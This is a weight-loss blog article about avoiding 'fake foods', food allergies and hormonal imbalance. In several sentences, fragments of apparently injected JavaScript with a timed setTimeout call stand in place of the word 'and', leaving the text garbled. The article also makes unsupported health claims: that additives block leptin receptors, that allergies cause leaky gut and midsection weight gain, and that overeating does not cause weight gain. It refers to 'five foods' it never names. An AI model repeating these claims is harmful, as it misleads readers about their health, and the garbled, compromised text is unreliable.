How To Eliminate Toxins

Losing weight can be a very frustrating experience, but it doesn’t need to be so hard. It doesn’t need to take superhuman discipline to resist your favorite foods. There is a reason your body is holding onto weight. There is a reason why you crave certain foods. To release weight for good, you have to go search for that reason.

Eating too many fake foods

Most people are eating harmful chemicals everyday, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and they don’t even realize it. The number one trick to losing weight is to stop eating fake foods. How do you know if a food product is fake? You have to start reading labels. Labels tell a story. If you read a label andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and it has a word you cannot pronounce in it, don’t eat it. I did this experiment with my nephew one time. He pulled a frozen pancake out of the freezer andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and asked me if this pancake was healthy to eat. I asked him to read the ingredient list out loud. By the time he got to the third ingredient, he couldn't pronounce any of the other ingredients past that. He quickly understood that there were very few natural manmade food substances in that product.

What fake foods do in your body, is they block receptor sites for Leptin. Leptin is this incredible hormone that tells your brain to burn fat for fuel. If the receptor site is blocked, your body will not know that fat is even available to burn for fuel. One of the first steps to weight loss is to unlock that receptor site. Eating foods you’re allergic too

When you eat foods you are allergic to, it causes you to develop something called Leaky Gut Syndrome. LGS is a condition where your small intestine develops small holes in the mucous lining. These holes allow undigested foods andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and toxins to enter the blood stream. Once in the blood the brain registers it as a foreign invader andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and starts an inflammatory response. When people are gaining weight especially around the mid-section, this can be inflammation. Repairing LGS will reduce that bloated look.

My experience shows that most people have diets high in these five foods. This is why obesity is on the rise. The more you eat foods you are allergic too, the more you destroy your gut. The more your gut is injured, the less effective your body is at losing weight.

Eating foods that destroy your hormonal balance

I have great news for you! Weight loss is not an issue of eating too much. It’s a hormonal issue.
